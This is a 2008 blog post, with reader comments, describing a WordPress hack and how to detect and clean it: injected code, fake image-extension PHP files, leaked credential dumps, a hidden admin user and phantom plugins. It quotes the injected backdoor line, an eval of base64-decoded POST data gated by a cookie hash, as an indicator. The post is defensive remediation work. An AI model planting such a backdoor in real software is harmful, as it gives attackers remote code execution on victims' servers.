Has Your WordPress Been Hacked Recently?

By: Sophia Lucero | April 16, 2008 | Leave a Comment

Matt Mullenweg’s recent post about a “bogus” WordPress security breach had me wondering about my own WordPress sites. Unfortunately, it turns out I’ve become a victim of a WordPress vulnerability whose symptoms are detailed here. Took me two whole nights of restoring my files and folders to their pristine condition. (Fingers crossed.) Take note that this is different from the ro8kfbsmag.txt hack, and seems to be a fairly recent attack. Thankfully, there are a lot of tell-tale signs:

Extra code added to the first line of PHP files

<?php if(md5($_COOKIE['_wp_debugger'])==”dfa1bcf40aa72fdb46ed40f7651fe76e”){ eval(base64_decode($_POST['file'])); exit; } ?>

Note that the letters numbers and numbers vary.

Solution: open the infected file and delete that code. I recommend using an FTP client like FileZilla, which when coupled with a text editor lets you edit a file then reflect thse changes on the server very quickly.

New files ending in _new, _old, .pngg, .jpgg, .giff appearing inside writable directories

See if there are any files in writable directories that have the same named as an existing file with the extensions _new.php, _old.php, .php.pngg, .php.jpgg, or .php.giff. These files will be executables that when called from a browser will display a fake “404 Not Found” error, but if called from a script with the matching hash from one of the hacked PHP scripts, will display system info about the server your site is sitting on.

Solution: delete the files.

New files named wp-info.txt which contain database usernames and passwords

This file will contain userinfo dumped from the MySQL database… usernames, emails, passwords, everything. Move it ASAP, but check your logs to see if it was accessed already.

Solution: delete the file and change all your passwords! Aside from your own, your visitors’ emails and passwords are also there, and somebody else is exploiting that information already.

New “WordPress” user in database (hidden in the admin panel users page)

One other thing I noticed, and this happened on the new 2.5 installs as well as the older ones that hadn’t been upgraded yet, was the silent addition of the user “WordPress”, with no info save a password, and an add date of all zeroes. There’s also no indication of user level in the database, and the user doesn’t show up in the User menu. However, when I was going through and deleting unnecessary “admin” logins, “WordPress” came up as one of the user options to reassign posts to… otherwise it might have been a while before I’d found that buried in the database.

Solution: delete the user. You need to access your database through phpMyAdmin or something similar.

WordPress version changed to 2.5

I’m logged into a site I know is still running 2.1.3, but the footer in the admin panels say 2.5 now.

Solution: upgrade to WordPress 2.5. Keeping your installation up-to-date eliminates old vulnerabilities.

More signs

The file creation and modification seemed to take place on April 11. For me it was the 12th. That’s surprisingly recent.

Also, you might get a lot of suspicious error messages in your logs, dating as far back as last year.

More Solutions

When it comes to security, there are a lot of possible culprits but in this particular situation, we can only be thankful there are a lot of indicative factors and fairly easy ways to resolve the problem. I cannot emphasize how important it is to upgrade immediately. Is it better to have non-working themes and plugins than an insecure site? I would think not.

However, one has to wonder how upgrading to WordPress 2.5 can fix the problem. Remember that when upgrading you are advised to delete the old files first then upload the new files. If you just upload and overwrite the old files, the new files such as the _new, _old, .pngg, .jpgg, .giff ones will remain on the server. Removing them one by one by going through each folder on your website will definitely be painful!

Also take a look at your file and folder permissions. We usually have to CHMOD our uploads, themes, and plugins folders so that we can edit them in the administration panel, but they also make for a hacker’s point of entry.

I believe the most crucial problem here are the wp-info.txt files. The other penetrations could have been used for adding spam comments and links only, but having access to people’s passwords is far worse, especially when it includes your own readers.

Update (April 17): There’s now a WordPress Codex page for this issue.

Update (May 2): Please continue to visit the WordPress Support forum for any new developments on this hack. There are other symptoms popping up, like unwanted plugins activated in the database (see active_plugins and deactivated_plugins under wp_options).

Update (June 10): Check out this very helpful post by Donncha O Caoimh.

Related Posts

Tags: , , , , , , ,

24 Comments

  1. links for 2008-04-16 « PinoyBlurker @ PinoyBlogoSphere.com Said,

    April 16, 2008 @ 11:31 pm

    [...] Has Your WordPress Been Hacked Recently? | WordPress Philippines Published in: [...]

  2. links for 2008-04-16 « PinoyBlogoSphere.com | PhilippineBlogoSphere.com Said,

    April 16, 2008 @ 11:34 pm

    [...] Has Your WordPress Been Hacked Recently? | WordPress Philippines [...]

  3. Pinoy Blurker » links for 2008-04-16 Said,

    April 16, 2008 @ 11:39 pm

    [...] Has Your WordPress Been Hacked Recently? | WordPress Philippines [...]

  4. Verifica-ti Wordpress-ul daca a fost hack-uit : Lazar’s Said,

    April 17, 2008 @ 8:08 am

    [...] duce cu gandul la hack-uri initiate foarte recent. Tinta: platformele Wordpress. Detalii si solutii aici. Time for [...]

  5. Technical troubles at East Coast Wahines - surf stories, surf reports, forums and blogs. Said,

    April 18, 2008 @ 4:30 pm

    [...] If you’re interested you can read more about it here: http://wordpressphilippines.org/blog/has-your-wordpress-been-hacked-recently/ [...]

  6. Avery Said,

    April 26, 2008 @ 10:18 am

    You’ll also want to look and see if you see reference in the database to plugins that don’t exist. I found (in the wp-options table) reference to a file in wp-content/themes/classic and a file in ../../../../../../../../../../tmp/ (there were a lot more ../s to make sure they made it to the root directory I guess. The files referenced seem encoded and are what “changes” the wp version number to display that it’s version 2.5 - who knows WHAT ELSE these phantom plugins do.

    They are only accessible by going to your phpmyadmin interface and looking at the wp-options table entries (you probably can just search your database for plugin and find the entry.) If you have the phantom Wordpress user, the wp-info.txt file - you will likely have this OTHER database change too.

    Avery’s last blog post..Google Reader cache-ing feed behavior

  7. Word Press Exploit - Netpond ? Said,

    April 26, 2008 @ 9:20 pm

    [...] affecting a lot of people. So far 1 of my blogs was hit but I’ve got it all fixed, I believe. Has Your WordPress Been Hacked Recently? | WordPress Philippines Serious vulnerability affecting most versions. Please check your files/logs. __________________ [...]

  8. Terry Trippany Said,

    April 27, 2008 @ 3:56 pm

    Thanks for this info. I am a web host and ran into an issue upgrading some of my users from 2.5 to 2.5.1. After much research I came across this post and nearly everything on this page was in the troubled installations.
    (including the ../../../../../../../../../../tmp style text in the active plugins).

    After correcting the issues the blogs work fine.

    -Trip

    Terry Trippany’s last blog post..Brazilian Oil Find Might End US Nightmare

  9. dissidenz.olifani.de » wordpress massenhaft gehackt Said,

    April 28, 2008 @ 5:06 am

    [...] vor sich hin. dieses problem ist jetzt im wordpress-support-forum entdeckt und diskutiert worden. dieser blog zeigt eine sinnvolle to-do-list an sofortmaßnahmen auf. sehr hilfreich ist auch der bislang letzte [...]

  10. Fordeler med ? oppgradere WP? - Webforumet.no - Webmaster forum Said,

    April 28, 2008 @ 8:46 pm

    [...] massivt hackerangrep mot en dr?ss wp-blogger den siste uka, og dette gjelder de fleste versjonene: Has Your WordPress Been Hacked Recently? | WordPress Philippines Personlig er jeg litt ‘p? hold’ f?r jeg oppgraderer til nyere versjoner p? flere blogger. Ellers [...]

  11. Another Hacker « Shamus Writes Said,

    April 28, 2008 @ 11:49 pm

    [...] forums and didn’t find anything useful for awhile – until I came across a link to this blog entry detailing the symptoms of a known hacker and how to look for and clean up after him.  Sure [...]

  12. Themepress » Have you upgraded to Wordpress 2.5.1 yet? Said,

    April 29, 2008 @ 4:06 am

    [...] you haven’t, then you might want to get cracking. As written in this article “Has your Wordpress been hacked recently”, a very invasive hack is showing up on more and more Wordpress installations. The key to entry [...]

  13. What Andy Saw » Blog Archive » Blog Attack! Said,

    April 29, 2008 @ 10:47 am

    [...] If you’re running your blog on WordPress, checkout Has Your Wordpress Been Hacked Recently? [...]

  14. hummel Said,

    May 1, 2008 @ 8:44 am

    I was hacked in this way: somebody edited my wp-db.php files and added hundreds of links in it (to get backlionks to theiir sites)
    I found it out in this way:
    once I saw some starnge folder full of some files in my ftp account (not related directory to wp blogs) and deleted it. Next day I opened my blog and it said error on some line in wp-db.php file. i checked this file and that named line was to include those links - aparently when I deleted that folder that line went broken and my blog got down. Deleted that line and everything ok.
    Anybody had the same experience, what could it be?

  15. How I fixed the WP 2.5.1 upgrade issue Said,

    May 1, 2008 @ 9:42 pm

    [...] has written a good overview and guide to check whether your blog has been hacked or not over at WordPress Philippines. Gave it a good read and used it like a checklist in my investigation to root out and solve this [...]

  16. Webloggin - Blog Archive » Wordpress 2.5.1 Upgrade Failure May Be Linked to Hack/Exploit Said,

    May 2, 2008 @ 2:24 am

    [...] people were having the same error. Well it turns out that my blogs had been somewhat hacked by an exploit that is detailed here. The exploit creates phantom users, phantom plugins and modifies some core files to allegedly get [...]

  17. Blendor » Wordpress Automatic Upgrade plugin Said,

    May 2, 2008 @ 4:22 am

    [...] it’s linked from the Wordpress.org instructions for upgrading. It’s also a good idea to check if you’ve been hacked . The older versions have a vulnerability that allows exposure of admin passwords and [...]

  18. WP bug solved: ‘WordPress 2.5.1 is available! Please update now’ : Make Money Online, Stocks, Forex, Mutual Funds Philippines Said,

    May 2, 2008 @ 8:22 pm

    [...] Wordpress support topic and a post in WordpressPhilippines.org were the most helpful with regard to this problem. The info below shows what I did with our [...]

  19. Hiatus & WordPress 2.5.1 » JaypeeOnline // Blogging News & Reviews Said,

    May 14, 2008 @ 11:17 pm

    [...] out this post from WordPress Philippines that talks about the recent WordPress vulnerability/hack in [...]

  20. Michael Said,

    May 24, 2008 @ 1:05 pm

    WP Security Scan Plugin:
    http://semperfiwebdesign.com/custom-applications/wp-security-scan/

    Michaels last blog post..Make my site rank #1 in Google

  21. Into the Woods » So I have been hacked Said,

    June 2, 2008 @ 11:51 am

    [...] nuevamente (porque ya lo perdi una vez) mi pagerank de Google, pero yo les diría a todos que le peguen una leída a ésto y se fijen si no les está pasando a ustedes también… es mejor prevenir que curar :P [...]

  22. temp » Blog Archive » pwned Said,

    June 6, 2008 @ 4:18 am

    [...] We got caught by a nasty Wordpress vulnerability and we’re in the process of restoring content and getting back to normal.  Please be [...]

  23. More WordPress blogs being hacked | WordPress Philippines Said,

    June 18, 2008 @ 12:00 pm

    [...] time, it was a WordPress vulnerability that was resolved by upgrading to the latest version. This time, it’s a non-WordPress issue, [...]

  24. Eugen J Said,

    July 3, 2008 @ 11:28 pm

    Also check: http://www.bloggerguide.net/blog-platform/wordpress/wordpress-exploit-giving-backlinks-redirects-and-headaches-but-no-visitors/ in addition to Donncha O Caoimh article.

RSS feed for comments on this post · TrackBack URI

Leave a Reply

Download WordPress
Performancing Services
Appnitro Machform
Performancing Metrics
WordPress Philippines